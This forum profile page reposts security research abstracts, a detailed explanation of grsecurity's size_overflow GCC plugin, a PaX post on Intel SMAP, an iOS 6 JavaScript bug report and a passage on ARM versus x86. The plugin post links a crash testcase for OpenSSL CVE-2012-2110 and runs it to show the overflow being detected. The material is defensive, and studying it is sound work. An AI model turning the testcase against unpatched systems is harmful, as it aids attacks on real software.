-
Posts
18736 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
Data Randomization Cristian Cadar Microsoft Research Cambridge, UK cristic@stanford.edu Periklis Akritidis Microsoft Research Cambridge, UK pa280@cl.cam.ac.uk Manuel Costa Microsoft Research Cambridge, UK manuelc@microsoft.com Jean-Phillipe Martin Microsoft Research Cambridge, UK jpmartin@microsoft.com Miguel Castro Microsoft Research Cambridge, UK mcastro@microsoft.com Abstract Attacks that exploit memory errors are still a serious problem. We present data randomization, a new technique that provides probabilistic protection against these attacks by xoring data with random masks. Data randomization uses static analysis to partition instruction operands into equivalence classes: it places two operands in the same class if they may refer to the same object in an execution that does not violate memory safety. Then it assigns a random mask to each class and it generates code instrumented to xor data read from or written to memory with the mask of the memory operand’s class. Therefore, attacks that violate the results of the static analysis have unpredictable results. We implemented a data randomization prototype that compiles programs without modifications and can preventmany attacks with low overhead. Our prototype prevents all the attacks in our benchmarks while introducing an average runtime overhead of 11%(0%to 27%) and an average space overhead below 1%. Download: research.microsoft.com/pubs/70626/tr-2008-120.pdf
-
Thwarting Code Injection Attacks with System Service Interface Randomization Xuxian Jiangy, Helen J. Wangz, Dongyan Xu, Yi-Min Wangz y George Mason University z Microsoft Research Purdue University xjiang@ise.gmu.edu fhelenw, ymwangg@microsoft.com dxu@cs.purdue.edu Abstract Code injection attacks are a top threat to today's Internet. With zero-day attacks on the rise, randomization techniques have been introduced to diversify software and operation systems of networked hosts so that attacks that succeed on one process or one host cannot succeed on others. Two most notable system-wide randomization techniques are Instruction Set Randomization (ISR) and Address Space Layout Randomization (ASLR). The former randomizes instruction set for each process, while the latter randomizes the memory address space layout. Both suffer from a number of attacks. In this paper, we advocate and demonstrate that by combining ISR and ASLR effectively, we can offer much more robust protection than each of them individually. However, trivial combination of both schemes is not sufcient. To this end, we make the key observation that system call instructions matter the most to attackers for code injection. Our system, RandSys, uses system call instruction randomization and the general technique of ASLR along with a number of new enhancements to thwart code injection attacks. We have built a prototype for both Linux and Windows platforms. Our experiments show that RandSys can effectively thwart a wide variety of code injection attacks with a small overhead. Keywords: Internet Security, Code Injection Attack, System Randomization Download: research.microsoft.com/en-us/um/people/helenw/papers/randSys.pdf
-
Linux Security in 10 years Brad Spengler / grsecurity Download: grsecurity.net/spender_summit.pdf
-
The Guaranteed End of Arbitrary Code Execution Online: http://grsecurity.net/PaX-presentation_files/frame.htm
-
Inside the Size Overflow Plugin by ephox » Tue Aug 28, 2012 5:30 pm Hello everyone, my name is Emese (ephox). You may already know me for my previous project, the constify gcc plugin that pipacs took over and put into PaX. http://www.grsecurity.net/~ephox/const_plugin/ This time I would like to introduce to you a 1-year-old project of mine that entered PaX a few months ago. It's another gcc plugin called size_overflow whose purpose is to detect a subset of the integer overflow security bugs at runtime. https://grsecurity.net/~ephox/overflow_plugin/ On integer overflows briefly In the C language integer types can represent a finite range of numbers. If the result of an arithmetic operation falls outside of the type's range (e.g., the largest representable value plus one) then the value overflows or underflows. This becomes a problem if the programmer didn't think of it, e.g., the size parameter of memory allocator function becomes smaller due to the overflow. There is a very good description on integer overflow in Phrack: http://www.phrack.org/issues.html?issue ... 10#article The history of the plugin The plugin is based on spender's idea, the intoverflow_t type found in older PaX versions. This was a 64 bit wide integer type on 32 bit archs and a 128 bit wide integer type on 64 bit archs. There were wrapper macros for the important memory allocator functions (e.g., kmalloc) where the value to be put into the size argument (of size_t type) could be checked against overflow. For example: #define kmalloc(size,flags) \ ({ \ void *buffer = NULL; \ intoverflow_t overflow_size = (intoverflow_t)size; \ \ if (!WARN(overflow_size > ULONG_MAX, "kmalloc size overflow\n")) \ buffer = kmalloc((size_t)overflow_size, (flags)); \ buffer; \ }) This solution had a problem in that the size argument is usually the result of a longer computation that consists of several expressions. The intoverflow_t cast based check could only verify the last expression that was used as the argument to the allocator function and even then it only helped if the type cast of the leftmost operand affected the other operands as well. Therefore if there was an integer overflow during the evaluation of the other expressions then the remaining computation would use the overflowed value that the intoverflow_t cast cannot detect. Second, only a few basic allocator functions had wrapper macros because wrapping every function with a size argument would have been a big job and resulted in an unmaintainable patch. In contrast, the size_overflow plugin recomputes all subexpressions of the expression with a double wide integer type in order to detect overflows during the evaluation of the expression. Internals of the size_overflow plugin The compilation process is divided into passes in between or in place of which a plugin can insert its own. Each pass has a specific task (e.g., optimization, transformation, analysis) and they run in a specific order on a translation unit (some optimization passes may be skipped depending on the optimization level). The plugin's pass (size_overflow_pass) executes after the "ssa" GIMPLE pass which is among the early GIMPLE passes. It's placed there to allow all the later optimization passes to properly optimize the code modified by the plugin. Before I describe the plugin in more detail, let's look at some gcc terms The gimple structure in gcc represents the statements (stmt) of the high level language. For example this is what a function call (gimple_code: GIMPLE_CALL) looks like: gimple_call <malloc, D.4425_2, D.4421_15> or a subtract (gimple_code: GIMPLE_ASSIGN) stmt: gimple_assign <minus_expr, D.4421_15, D.4464_12, a_5> This stmt has 3 operands, one lhs (left hand side) and two rhs (right hand side) ones. Each variable is of type "tree" and has a name (SSA_NAME) and version number (SSA_NAME_VERSION) while we are in SSA (static single assignment) mode. As we can see the parameter of malloc is the variable D.4421_15 (SSA_NAME: 4421, SSA_NAME_VERSION: 15) which is also the lhs of the assignment, so we use-def relation between the two stmts, that is the defining statement (def_stmt) of the variable D.4421_15 is the D.4421_15 = D.4464_12 - a_5 stmt. Further reading on SSA and GIMPLE: SSA - GNU Compiler Collection (GCC) Internals GIMPLE - GNU Compiler Collection (GCC) Internals The plugin gets called for each function and goes through their stmts looking for calls to marked functions. In the kernel, functions can be marked two ways: with a function attribute for fuctions at the bottom of the function call hierarchy (e.g., copy_user_generic, __copy_from_user, __copy_to_user, __kmalloc, __vmalloc_node_range, vread) listed in a hash table (for functions calling the above basic functions) In userland there is only a hash table (e.g., openssl). The present description covers the kernel. The attribute Plugins can define new attributes. This plugin defines a new function attribute which is used to mark the size parameters of interesting functions so that they can be tracked backwards. This is what the attribute looks like: __attribute__((size_overflow(1))) where the parameter (1) refers to the function argument (they are numbered from 1) that we want to check for overflow. In the kernel there is a #define for this attribute similarly to other attributes: __size_overflow(...). For example: unsigned long __must_check clear_user(void __user *mem, unsigned long len) __size_overflow(2); static inline void* __size_overflow(1,2) kcalloc(size_t n, size_t size, gfp_t flags) { ... } Further documentation about attributes: Attributes - GNU Compiler Collection (GCC) Internals The hash table Originally we only had the attribute similarly to the constify plugin but in order to reduce the kernel patch size (e.g., in 3.5.1 2920 functions are marked) all functions except for the base ones are stored in a hash table. The hash table is generated by the tools/gcc/generate_size_overflow_hash.sh script from tools/gcc/size_overflow_hash.data into tools/gcc/size_overflow_hash.h. A hash table entry is described by the size_overflow_hash structure whose fields are the following: next: the hash chain pointer to the next entry name: name of the function param: an integer with bits set corresponding to the size parameters For example this is what the hash entry of the include/linux/slub_def.h:kmalloc function looks like: struct size_overflow_hash _000008_hash = { .next = NULL, .name = "kmalloc", .param = PARAM1, }; The hash table is indexed by a hash computed from numbers describing the function declarations (get_tree_code()). Example: struct size_overflow_hash *size_overflow_hash[65536] = { [11268] = &_000008_hash, }; The hash algorithm is CrapWow: http://www.team5150.com/~andrew/noncryptohashzoo/CrapWow.html Enabling the size_overflow plugin in the kernel in menuconfig (under PaX): Security options -> PaX -> Miscellaneous hardening features -> Prevent various integer overflows in function size parameters .config (under PaX): CONFIG_PAX_SIZE_OVERFLOW .config (without PaX): CONFIG_SIZE_OVERFLOW stmt duplication with double wide integer types When the plugin finds a marked function then it traces back the use-def chain of the parameter(s) defined by the function attribute. The stmts found recursively are duplicated using variables of double wide integer types. In some cases duplication is not the right strategy. In these cases the plugin takes the lhs of the original stmt and casts it to the double wide type: function calls (GIMPLE_CALL): they cannot be duplicated because they may have side effects. This also means that the current plugin version doesn't check if a function returns an overflowed value, see todo inline asm (GIMPLE_ASM): it may have side effects too. taking the address of an object (ADDR_EXPR): todo pointers (MEM_REF, etc.): todo division (RDIV_EXPR, etc.): special case for the kernel because it doesn't support division with double wide types global variables: todo If the marked function's parameter can be traced back to a parameter of the caller then the plugin checks if the caller is already in the hash table (or it is marked with the attribute). If it isn't then the plugin prints the following message: Function %s is missing from the size_overflow hash table +%s+%d+%u+" (caller's name, parameter's number, hash) If anyone sees this message, please send it to me by e-mail (re.emese@gmail.com) so that I can put the caller into the hash table, otherwise the plugin will not apply the overflow check to it. Inserting the overflow checks The plugin inserts overflow checks in the following cases: marked function parameters just before the function call stmt with a constant operand, see gcc intentional overflow negations (BIT_NOT_EXPR) type cast stmts between these types: --------------------------------- | from | to | lhs | rhs | --------------------------------- | u32 | u32 | - | ! | | u32 | s32 | TODO | *! | | s32 | u32 | TODO | *! | | s32 | s32 | - | ! | | u32 | u64 | ! | ! | | u32 | s64 | TODO | ! | | s32 | u64 | TODO | ! | | s32 | s64 | ! | ! | | u64 | u32 | ! | ! | | u64 | s32 | TODO | ! | | s64 | u32 | TODO | ! | | s64 | s32 | ! | ! | | u64 | u64 | - | ! | | u64 | s64 | TODO | *! | | s64 | u64 | TODO | *! | | s64 | s64 | - | ! | --------------------------------- Legend: from: source type to: destination type lhs: is the lhs checked? rhs: is the rhs checked? !: the plugin inserts an overflow check TODO: would be nice to insert an overflow check, see todo *!: the plugin inserts an overflow check except when the stmt's def_stmt is a MINUS_EXPR (subtraction) -: no overflow check is needed When the plugin finds one of the above cases then it will insert a range check against the double wide variable value (TYPE_MIN, TYPE_MAX of the original variable type). This guarantees that at runtime the value fits into the original variable's type range. If the runtime check detects an overflow then the report_size_overflow function will be called instead of executing the following stmt. The marked function's parameter is replaced with a variable cast down from its double wide clone so that gcc can potentially optimize out the stmts computing the original variable. If we uncomment the print_the_code_insertions function call in the insert_check_size_overflow function then the plugin will print out this message during compilation: "Integer size_overflow check applied here." This message isn't too useful because later passes in gcc will optimize out about 6 out of 10 insertions. If anyone is interested in the insertion count after optimizations then try this command (on the kernel): objdump -drw vmlinux | grep "call.*report_size_overflow" | wc -l report_size_overflow The plugin creates the report_size_overflow declaration in the start_unit_callback, but the definition is always in the current program. The plugin inserts only the report_size_overflow calls. This is a no-return function. This function prints out the file name, the function name and the line number of the detected overflow. If the stmt's line number is not available in gcc then it prints out the caller's start line number. The last two strings are only debug information. The report_size_overflow function's message looks like this (without PaX it uses SIZE_OVERFLOW instead of PAX): PAX: size overflow detected in function main tests/main12.c:27 cicus.4_21 (max) In the kernel the report_size_overflow function is in fs/exec.c. The overflow message is sent to dmesg along with a stack backtrace and then it sends a SIGKILL to the process that tiggered the overflow. In openssl the report_size_overflow function is in crypto/mem.c. The overflow message is sent to syslog and the triggering process is sent a SIGSEGV. Plugin internals through a simple example The source code (test.c): extern void *malloc(size_t size) __attribute__((size_overflow(1))); void * __attribute__((size_overflow(1))) coolmalloc(size_t size) { return malloc(size); } void report_size_overflow(const char *file, unsigned int line, const char *func, const char *ssa_name) { printf("SIZE_OVERFLOW: size overflow detected in function %s %s:%u %s", func, file, line, ssa_name); _exit(1); } int main(int argc, char *argv[]) { unsigned long a; unsigned long b; unsigned long c = 10; a = strtoul(argv[1], NULL, 0); b = strtoul(argv[2], NULL, 0); c = c + a * b; return printf("%p\n", coolmalloc(c)); } Compile the plugin: gcc -I`gcc -print-file-name=plugin`/include/c-family -I`gcc -print-file-name=plugin`/include -fPIC -shared -O2 -o size_overflow_plugin.so size_overflow_plugin.c Compile test.c with the plugin and dump its ssa representations: gcc -fplugin=size_overflow_plugin.so test.c -O2 -fdump-tree-all Each dumpable gcc pass is dumped by -fdump-tree-all. This blog post focuses on the ssa and the size_overflow passes. The marked function is coolmalloc, the traced parameter is c_12. The main function's ssa representaton is below, just before executing the size_overflow pass (test.c.*.ssa*): main (int argc, char * * argv) { long unsigned int c; long unsigned int b; long unsigned int a; const char * restrict D.3291; void * D.3290; int D.3289; long unsigned int D.3288; const char * restrict D.3287; char * D.3286; char * * D.3285; const char * restrict D.3284; char * D.3283; char * * D.3282; <bb 2>: c_1 = 10; D.3282_3 = argv_2(D) + 4; D.3283_4 = *D.3282_3; D.3284_5 = (const char * restrict) D.3283_4; a_6 = strtoul (D.3284_5, 0B, 0); D.3285_7 = argv_2(D) + 8; D.3286_8 = *D.3285_7; D.3287_9 = (const char * restrict) D.3286_8; b_10 = strtoul (D.3287_9, 0B, 0); D.3288_11 = a_6 * b_10; c_12 = D.3288_11 + c_1; D.3290_13 = coolmalloc (c_12); D.3291_14 = (const char * restrict) &"%p\n"[0]; D.3289_15 = printf (D.3291_14, D.3290_13); return D.3289_15; } After the size_overflow pass on a 32 bit arch (test.c.*size_overflow*): main (int argc, char * * argv) { long unsigned int cicus.7; long long unsigned int cicus.6; long long unsigned int cicus.5; long long unsigned int cicus.4; long long unsigned int cicus.3; long long unsigned int cicus.2; long unsigned int c; long unsigned int b; long unsigned int a; const char * restrict D.3291; void * D.3290; int D.3289; long unsigned int D.3288; const char * restrict D.3287; char * D.3286; char * * D.3285; const char * restrict D.3284; char * D.3283; char * * D.3282; <bb 2>: c_1 = 10; cicus.5_24 = (long long unsigned int) c_1; D.3282_3 = argv_2(D) + 4; D.3283_4 = *D.3282_3; D.3284_5 = (const char * restrict) D.3283_4; a_6 = strtoul (D.3284_5, 0B, 0); cicus.2_21 = (long long unsigned int) a_6; D.3285_7 = argv_2(D) + 8; D.3286_8 = *D.3285_7; D.3287_9 = (const char * restrict) D.3286_8; b_10 = strtoul (D.3287_9, 0B, 0); cicus.3_22 = (long long unsigned int) b_10; D.3288_11 = a_6 * b_10; cicus.4_23 = cicus.2_21 * cicus.3_22; c_12 = D.3288_11 + c_1; cicus.6_25 = cicus.4_23 + cicus.5_24; cicus.7_26 = (long unsigned int) cicus.6_25; if (cicus.6_25 > 4294967295) goto <bb 3>; else goto <bb 4>; <bb 3>: report_size_overflow ("test.c", 28, "main", "cicus.6_25 (max)\n"); <bb 4>: D.3290_13 = coolmalloc (cicus.7_26); D.3291_14 = (const char * restrict) &"%p\n"[0]; D.3289_15 = printf (D.3291_14, D.3290_13); return D.3289_15; } Some problems encountered during development gcc intentional overflow: Gcc can produce unsigned overflows while transforming expressions. e.g., it can transform constants that will produce the correct result with unsigned overflow on the given type. (e.g., a-1 -> a+4294967295) The plugin used to detect this (false positive) overflow at runtime . The solution is to not duplicate such stmts that contain constants. Instead, the plugin inserts an overflow check for the non-constant rhs before that stmt and uses its lhs (cast to the double wide type) in later duplication. For example on 32 bit: coolmalloc(a * b - 1 + argc) before size_overflow plugin:... D.4416_10 = a_5 * b_9; D.4418_13 = D.4416_10 + argc.0_12; D.4419_14 = D.4418_13 + 4294967295; D.4420_15 = coolmalloc (D.4419_14); ... after size_overflow plugin: ... D.4416_10 = a_5 * b_9; cicus.7_25 = cicus.4_22 * cicus.6_24; D.4418_13 = D.4416_10 + argc.0_12; cicus.9_27 = cicus.7_25 + cicus.8_26; cicus.10_28 = (unsigned int) cicus.9_27; cicus.11_29 = (long long unsigned int) cicus.9_27; if (cicus.11_29 > 4294967295) goto <bb 3>; else goto <bb 4>; <bb 3>: report_size_overflow ("test.c", 28, "main"); <bb 4>: D.4419_14 = cicus.10_28 + 4294967295; cicus.12_30 = (long long int) D.4419_14; ... when a size parameter is used for more than one purpose (not just for size): The plugin cannot recognize this case. When I get a false positive report I remove the function from the hash table. type cast from gcc or the programmer causing intentional overflows. This is the reason for the TODOs in the table above Detecting a real security issue I'll demonstrate the plugin on an openssl 1.0.0 bug (CVE-2012-2110). To reproduce the overflow with this: http://lock.cmpxchg8b.com/openssl-1.0.1-testcase-32bit.crt.gz Download the plugin source (or use the ebuild) from here: https://grsecurity.net/~ephox/overflow_plugin/ Download the openssl patch (that contains the report_size_overflow function): http://grsecurity.net/~ephox/overflow_plugin/userland_patches/openssl-1.0.0/ Compile openssl with the plugin (see the README) after that we can reproduce the bug: openssl-1.0.0.h/bin $ ./openssl version OpenSSL 1.0.0h 12 Mar 2012 openssl-1.0.0.h/bin $ ./openssl x509 -in ../../openssl-1.0.1-testcase-32bit.crt -text -noout -inform DER Segmentation fault In syslog there is the plugins's message: SIZE_OVERFLOW: size overflow detected in function asn1_d2i_read_bio a_d2i_fp.c:228 cicus.69_205 (max) I'll have more (gentoo) ebuilds if anyone wants to use the plugin in userland (for now only openssl): http://grsecurity.net/~ephox/overflow_plugin/gentoo/ Performance impact hardware: quad core sandy bridge kernel version: 3.5.1 patch: pax-linux-3.5.1-test16.patch overflow checks after optimization (gcc-4.7.1): 931 With the size_overflow plugin disabled: Performance counter stats for 'du -s /test' (10 runs): 4345.283145 task-clock # 0.983 CPUs utilized ( +- 0.12% ) 1,107 context-switches # 0.255 K/sec ( +- 0.09% ) 0 CPU-migrations # 0.000 K/sec ( +-100.00% ) 3,763 page-faults # 0.866 K/sec ( +- 0.13% ) 14,641,126,270 cycles # 3.369 GHz ( +- 0.03% ) 4,228,389,062 stalled-cycles-frontend # 28.88% frontend cycles idle ( +- 0.06% ) 1,962,172,809 stalled-cycles-backend # 13.40% backend cycles idle ( +- 0.23% ) 25,463,911,605 instructions # 1.74 insns per cycle # 0.17 stalled cycles per insn ( +- 0.01% ) 6,968,592,408 branches # 1603.714 M/sec ( +- 0.01% ) 47,230,732 branch-misses # 0.68% of all branches ( +- 0.07% ) 4.419888484 seconds time elapsed ( +- 0.12% ) With the size_overflow plugin enabled: Performance counter stats for 'du -s /test' (10 runs): 4291.088943 task-clock # 0.983 CPUs utilized ( +- 0.08% ) 1,093 context-switches # 0.255 K/sec ( +- 0.08% ) 0 CPU-migrations # 0.000 K/sec 3,761 page-faults # 0.877 K/sec ( +- 0.15% ) 14,481,436,247 cycles # 3.375 GHz ( +- 0.05% ) 4,155,959,526 stalled-cycles-frontend # 28.70% frontend cycles idle ( +- 0.15% ) 2,003,994,250 stalled-cycles-backend # 13.84% backend cycles idle ( +- 0.54% ) 25,436,031,783 instructions # 1.76 insns per cycle # 0.16 stalled cycles per insn ( +- 0.00% ) 6,960,975,325 branches # 1622.193 M/sec ( +- 0.00% ) 47,125,984 branch-misses # 0.68% of all branches ( +- 0.07% ) 4.365185965 seconds time elapsed ( +- 0.08% ) TODO: I don't know why it was faster with the plugin on these tests During compilation it didn't cause too much slowdown (0.077s only). Allyes kernel config statistics after optimization (number of calls to report_size_overflow, gcc-4.6.2) 3.5.0: vmlinux_4.6.x_i386-yes: 2556 vmlinux_4.6.x_x86_64-yes: 2659 3.2.26: vmlinux_4.6.x_i386-yes: 2657 vmlinux_4.6.x_x86_64-yes: 2756 2.6.32.59: vmlinux_4.6.x_i386-yes: 1893 vmlinux_4.6.x_x86_64-yes: 2353 Future plans enable the plugin to compile c++ sources compile the following programs with the plugin glibc: i tried to compile it already but the make system doesn't like my report_size_overflow function, so I'll try it later glib syslog-ng: I don't yet know where to report the overflow message (chicken and egg problem ) firefox chromium samba apache php the Android kernel anything with an integer overflow CVE [*]plugin internals plans: print out overflowed value in the report message comments optimization: use unlikely/__builtin_expect for the inserted checks if the expression can be tracked back to the result of a function call then the function's return value should be tracked back as well handle ADDR_EXPR make use of LTO (gcc 4.7+): could get rid of the hash table llvm size_overflow plugin an IPA pass to be able to track back across static functions in a translation unit, it would reduce the hash table handle function pointers handle struct fields fix this side effect: warning: call to 'copy_to_user_overflow' declared with attribute warning: copy_to_user() buffer size is not provably correct solve all the TODO items in the cast handling table If anyone's interested in compiling other userland programs with the plugin then please send the hash table and the patch to me please Sursa: grsecurity forums • View topic - Inside the Size Overflow Plugin
-
[h=3]Supervisor Mode Access Prevention[/h]by PaX Team » Fri Sep 07, 2012 9:05 pm With the latest release of their Architecture Instruction Set Extensions Programming Reference Intel has finally lifted the veil on a new CPU feature to debut in next year's Haswell line of processors. This new feature is called Supervisor Mode Access Prevention (SMAP) and there's a reason why its name so closely resembles Supervisor Mode Execution Prevention (SMEP), the feature that debuted with Ivy Bridge processors a few months ago. While the purpose of SMEP was to control instruction fetches and code execution from supervisor mode (traditionally used by the kernel component of operating systems), SMAP is concerned with data accesses from supervisor mode. In particular, SMEP, when enabled, prevents code execution from userland memory pages by the kernel (the favourite exploit technique against kernel security bugs), whereas SMAP will prevent unintended data accesses to userland memory. The twist in the story and the reason why these security features couldn't be implemented as one lies in the fact that the kernel does have legitimate need to access data in userland memory at times while no contemporary kernel needs to execute code from there. In other words, while SMEP can be enabled unconditionally by flipping a bit at boot time, SMAP needs more care because it has to be disabled/enabled around legitimate accessor functions in the kernel. Intel has added two new instructions for this very purpose (CLAC/STAC) and repurposed the alignment check status bit in supervisor mode to enable quick switching around SMAP at runtime. This will require more extensive changes in kernel code than SMEP did but the amount of code is still quite managable. Third party kernel modules that don't use the kernel's userland accessor functions will have to take care of switching SMAP on/off themselves. What does SMAP mean for PaX? The situation is similar to last year's SMEP that made efficient implementation of (partial) KERNEXEC possible on amd64 (i386/KERNEXEC continues to rely on segmentation instead which provides better protection than SMEP can). SMAP's analog feature in PaX is called UDEREF which so far couldn't be efficiently implemented on amd64 (once again, i386/UDEREF will continue to rely on segmentation to provide better userland/kernel separation than SMAP can). Beyond allowing an efficient implementation of UDEREF there'll be other uses for SMAP (or perhaps a future variant of it) in PaX: sealed kernel memory whose access is carefully controlled even for kernel code itself. What does SMAP mean for security? Similarly to UDEREF, an SMAP enabled kernel will be prevented from accessing userland memory in unintended ways, e.g., attacker controlled pointers can no longer target userland memory directly, but even simple kernel bugs such as NULL pointer based dereferences will just trigger a CPU exception instead of letting the attacker take over kernel data flow. Coupled with SMEP this means that future exploits against memory corruption bugs will have to entirely rely on targeting kernel memory (which has been the case under UDEREF/KERNEXEC for many years now). This of course means that for reliable exploitation detailed knowledge of runtime kernel memory will become a premium, therefore abusing bugs that leak kernel memory to userland will become the first step towards exploiting memory corruption bugs. While UDEREF and SMAP prevent gratuitous memory leaks, they still have to allow intended userland accesses and that is exactly the escape hatch that several exploits have already targeted and we can expect more in the future. Fortunately we are once again at the forefront of this game with several features that prevent or at least greatly reduce the amount of informaton that can be so leaked from the kernel to userland (HIDESYM, SANITIZE, SIZE_OVERFLOW, STACKLEAK, USERCOPY). TL;DR: Intel implements UDEREF equivalent 6 years after PaX, PaX will make use of it on amd64 for improved performance. Sursa: grsecurity forums • View topic - Supervisor Mode Access Prevention
-
iOS 6 Javascript Bug Raises Potential Security And Privacy Questions By Istvan Fekete last updated December 23, 2012 iOS 6 Safari has a potentially serious Javascript bug, which could have some serious security and privacy implications. According to a report from AppleInsider, users who toggle off Javascript in the iOS 6 Safari web browser are not totally in the clear. The appearance of a Smart App Banner designed to give developers the ability to promote App Store software within Safari on a certain website, automatically toggles your Javascript back on without notifying the user. You can check out this bug by opening up the Setting app and choosing Safari, then turning off Javascript. Then you can visit this test page using your iPhone's browser. As you will see, it will turn on Javascript, without notifying you. Peter Eckersley, technology products director with digital rights advocacy group, the Electronic Frontier Foundation, said he would characterize such an issue as a "serious privacy and security vulnerability." Neither Eckersley nor the EFF had heard of the bug in iOS 6, nor had they independently tested to confirm that they were able to replicate the issue. But Eckersley said that if the problem is in fact real, it's something that Apple should work to address as quickly as possible. "It is a security issue, it is a privacy issue, and it is a trust issue," Eckersley said. "Can you trust the UI to do what you told it to do? It's certainly a bug that needs to be fixed urgently." According to the report, this issue has existed ever since iOS 6 went public, and the recent updates iOS 6.0.1 and iOS 6.0.2 didn't patch it. Furthermore, the bug isn't iPhone specific, it applies to all iDevices running iOS 6 and even iOS 6.1 beta seems to carry this bug as well. Sursa: iOS 6 Javascript Bug Raises Potential Security And Privacy QuestionsJaxov
-
The End of x86? An Update by mjfern on December 21, 2012 In October 2010, I predicted the disruption of the x86 architecture, along with its major proponents Intel and AMD. The purpose of this current article is to reassess this prediction in light of recent events. Below, I present the classic signs of disruption (drawing on Christensen’s framework), my original arguments in blockquotes, and then an update. 1. The current technology is overshooting the needs of the mass market. Due to a development trajectory that has followed in lockstep with Moore’s Law, and the emergence of cloud computing, the latest generation of x86 processors now exceed the performance needs of the majority of customers. Because many customers are content with older generation microprocessors, they are holding on to their computers for longer periods of time, or if purchasing new computers, are seeking out machines that contain lower performing and less expensive microprocessors. x86 shipments dropped by 9% in Q3 2012. Furthermore, the expected surge in PC sales (and x86 shipments) in Q4 due to the release of Windows 8 has failed to materialize. NPD data indicates that Windows PCs sales in U.S. retail stores fell a staggering 21% in the four-week period from October 21 to November 17, compared to the same period the previous year. [1] In short, there is now falling demand for x86 processors. Computer buyers are shifting their spending from PCs to next generation computing devices, including smartphones and tablets. 2. A new technology emerges that excels on different dimensions of performance. While the x86 architecture excels on processing power – the number of instructions handled within a given period of time – the ARM architecture excels at energy efficiency. According to Data Respons (datarespons.com, 2010), an “ARM-based system typically uses as little as 2 watts, whereas a fully optimized Intel Atom solution uses 5 or 6 watts.” The ARM architecture also has an advantage in form factor, enabling OEMs to design and produce smaller devices. While Intel has closed the ARM energy efficiency gap with its latest x86 Atom processers, the latest generation ARM-based chips are outperforming their Atom counterparts. And the performance advantage of ARM-based processors is expected through 2013. The ARM architecture also continues to maintain a significant advantage in the area of customization, form factor, and price due to ARM Holding’s unique licensing-based business model. Because of these additional benefits of ARM technology, it’s unlikely that Intel’s energy efficiency gains will significantly affect its short-term market penetration. 3. Because this new technology excels on a different dimension of performance, it initially attracts a new market segment. While x86 is the mainstay technology in PCs, the ARM processor has gained significant market share in the embedded systems and mobile devices markets. ARM-based processors are used in more than 95% of mobile phones (InformationWeek, 2010). And the ARM architecture is now the main choice for deployments of Google’s Android and is the basis of Apple’s A4 system on a chip, which is used in the latest generation iPod Touch and Apple TV, as well as the iPhone 4 and iPad. ARM-based processors continue to dominate smartphones and tablets, with the ARM architecture maintaining a market share of 95% and 98%, respectively. [2] In the first half of 2012, there were just six phones with x86 chips inside (i.e., 0.2% of the worldwide market). And, as of December 2012, there was scarce availability of tablets with x86 processors. [3] A major concern going forward is that Intel is limiting tablet support to Windows 8. 4. Once the new technology gains a foothold in a new market segment, further technology improvements enable it to move up-market, displacing the incumbent technology. With its foothold in the embedded systems and mobile markets, ARM technology continues to improve. The latest generation ARM chip (the Cortex-A15) retains the energy efficiency of its predecessors, but has a clock speed of up to 2.5 GHz, making it competitive with Intel’s chips from the standpoint of processing power. As evidence of ARM’s move up-market, the startup Smooth-Stone recently raised $48m in venture funding to produce energy efficient, high performance chips based on ARM to be used in servers and data centers. I suspect we will begin seeing the ARM architecture in next generation latops, netbooks, and smartphones (e.g., A4 in a MacBook Air). ARM’s latest Cortex-A15 processor is highly competitive with Intel’s Atom line of processors. In a benchmarking analysis, “the [ARM-based] Samsung Exynos 5 Dual…easily beat out all of the tested Intel Atom processors.” And while Intel’s Core i3 processors outperformed the ARM-based processors, the iCore’s performance-per-watt makes it unsuitable for smartphones and tablets. Since energy conservation and cost is a growing concern among manufacturers, IT departments, and consumers, ARM-based chips are also moving upmarket into more demanding devices. While ARM technology hasn’t made much headway in traditional desktop PCs and laptops, it’s been deployed in the latest generation Google Chromebook, produced by Samsung. It’s also the processor of choice in Microsoft’s Surface RT, which is arguably a hybrid device (PC and tablet) given it runs Windows and Office and has a keyboard. Furthermore, ARM’s penetration of the server market is ushering in a new “microserver” era, with support from AMD, Calxeda, Dell, HP, Marvell, Samsung, Texas Instruments, and others (e.g., Applied Micro). [4] 5. The new, disruptive technology looks financially unattractive to established companies, in part because they have a higher cost structure. In 2009, Intel’s costs of sales and operating expenses were a combined $29.6 billion. In contrast, ARM Holdings, the company that develops and supports the ARM architecture, had total expenses (cost of sales and operating) of $259 million. Unlike Intel, ARM does not produce and manufacture chips; instead it licenses its technology to OEMs and other parties and the chips are often manufactured using a contract foundry (e.g., TSMC). Given ARM’s low cost structure, and the competition in the foundry market, “ARM offers a considerably cheaper total solution than the x86 architecture can at present…” (datarespons.com, 2010). Intel is loathe to follow ARM’s licensing model because it would reduce Intel’s revenues and profitability substantially. In the first three quarters of 2012, Intel had revenue of $38.864 billion, operating expenses of $28.509b, and operating income of $11.355b. In contrast, ARM Holdings, with its licensing-based business model, had revenue of $886.88 million, operating expenses of $576.5m, and operating income of $307.12m. ARM Holdings has revenues and profits that are just a fraction (2-3%) of Intel’s. This is the case even though ARM-based processors have a much greater share of the overall processor market. [5] The smartphone and tablet markets, despite their sheer size and growth rates, are financially unattractive in comparison to the PC market. The price point and margins on processors in the mobile markets are significantly lower than that of higher-end PC and server processors. For instance, as of November 2012, the “Atom processor division contribute[d] only around 2% to Intel’s valuation.” In short, the ARM architecture appears to be in the early stages of disrupting x86, not just in the mobile and embedded systems markets, but also in the personal computer and server markets, the strongholds of Intel and AMD. This is evidenced in part by investors’ expectations for ARM’s, Intel’s and AMD’s future performance in microprocessor markets: today ARM Holdings has a price to earnings ratio of 77.93, while Intel and AMD have price to earnings ratios of 10.63 and 4.26, respectively. It doesn’t appear Intel (or AMD) have solved the disruptive threat posed by ARM. The ARM architecture is maintaining its market share in smartphones and tablets, and gaining ground in upmarket devices, from hybrids (Chromebook and Surface RT) to servers. Investors concur with this assessment, as ARM Holdings has a price to earnings ratio of 70.74, while Intel has a price to earnings ratio of 9.22. [6] For Intel and AMD to avoid being disrupted, they must offer customers a microprocessor with comparable (or better) processing power and energy efficiency relative to the latest generation ARM chips, and offer this product to customers at the same (or lower) price point relative to the ARM license plus the costs of manufacturing using a contract foundry. The Intel Atom is a strong move in this direction, but the Atom is facing resistance in the mobile market and emerging thin device markets (e.g., tablets) due to concerns about its energy efficiency, form factor, and price point. While Intel has closed the energy efficiency gap with its latest Atom processors, it still lags in performance and hasn’t dealt with the issues of customization and form factor. It’s likely that its pricing also remains unattractive. Although I don’t have precise data on Intel or ARM’s pricing for comparable processors, one can get an estimate by comparing Intel’s listed processor prices with teardown data from iSuppli. According to this rough analysis, the latest Atom processors range in price from $42-$75, while ARM-based processors have prices (including manufacturing) in the $15-25 range. [7] Therefore, Intel would need to offer a 60%+ 